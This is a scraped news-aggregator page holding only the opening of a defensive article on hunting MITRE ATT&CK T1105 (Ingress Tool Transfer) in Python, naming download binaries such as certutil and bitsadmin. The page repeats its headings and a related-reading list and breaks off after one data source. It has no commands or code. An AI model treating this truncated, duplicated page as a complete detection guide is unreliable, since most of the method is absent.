Detecting Ingress Tool Transfer (T1105) with Python

After initial access, attackers almost always need to pull more tooling onto the host: a beacon, a credential dumper, a tunneler. That step is Ingress Tool Transfer (T1105) in MITRE ATT&CK, and it is hard to catch with signatures because the transfer mechanisms are legitimate. certutil, bitsadmin, curl, and PowerShell all download files for normal reasons. The signal is in the combination and the rarity, not the binary itself.

This is where a little data science beats another detection rule. Here is how to hunt T1105 in Python across three layers: the process command line, the process-to-network relationship, and the payload on the wire.

Where T1105 Shows Up in Your Logs

Three sources cover most of it:

Sysmon Event ID 1 (process creation) for the download command line and parent process

Where T1105 Shows Up in Your Logs

Three sources cover most of it:

Sysmon Event ID 1 (process creation) for the download command line and parent process

Detecting Ingress Tool Transfer (T1105) with Python

Detecting Ingress Tool Transfer (T1105) with Python

Other newsrooms on this story

Related reading

Detecting Adversary-in-the-Middle (T1557) with Data Science

What 45 Days of Watching Your Own Tools Will Tell You About Your Real Attack…

AI-built ransomware toolkit automates EDR evasion, AD discovery

How to detect and prevent Contagious Interview IDE attacks

What to know about ToolShell, the SharePoint threat under mass exploitation

CTF Writeup Silentium - HTB

Other newsrooms on this story

Related reading

Detecting Adversary-in-the-Middle (T1557) with Data Science

What 45 Days of Watching Your Own Tools Will Tell You About Your Real Attack…

AI-built ransomware toolkit automates EDR evasion, AD discovery

How to detect and prevent Contagious Interview IDE attacks

What to know about ToolShell, the SharePoint threat under mass exploitation

CTF Writeup Silentium - HTB